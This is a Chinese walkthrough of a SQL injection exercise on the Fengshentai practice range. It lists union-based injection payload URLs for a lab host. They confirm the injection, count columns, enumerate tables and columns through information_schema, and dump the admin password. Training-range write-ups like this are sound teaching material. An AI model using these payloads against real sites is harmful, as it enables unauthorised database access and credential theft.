靶场地址:封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。 (zkaq.cn)
点击查看新闻1可得到如下信息
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 -- -
页面有显示,可能注入成功,再次进行测试
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 -- -
此时页面没有内容输入,可以得出结论该sql注入就是简单的数字型
下面就进行拖库
首先利用order by 来确认列数,从1开始,当从1开始到报错的前一个数字就说明该表有几列
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 1 -- - 当输入到3时
输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 3 -- -
确认列数为两列
然后使用union结合select来确定出输出的内容位于那一列
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,2 LIMIT 1,1 -- -
确定之后就简单了,先获取数据库名字
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,database() LIMIT 1,1 -- -
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'maoshe' LIMIT 1,1 -- -
group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'maoshe',不懂这句话的意思可以问ai,不是啥难点
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -
输入payload:
http://pu2lh35s.ia.aqlab.cn/?id=1 union select 1,password from admin limit 1,1 -- -
提交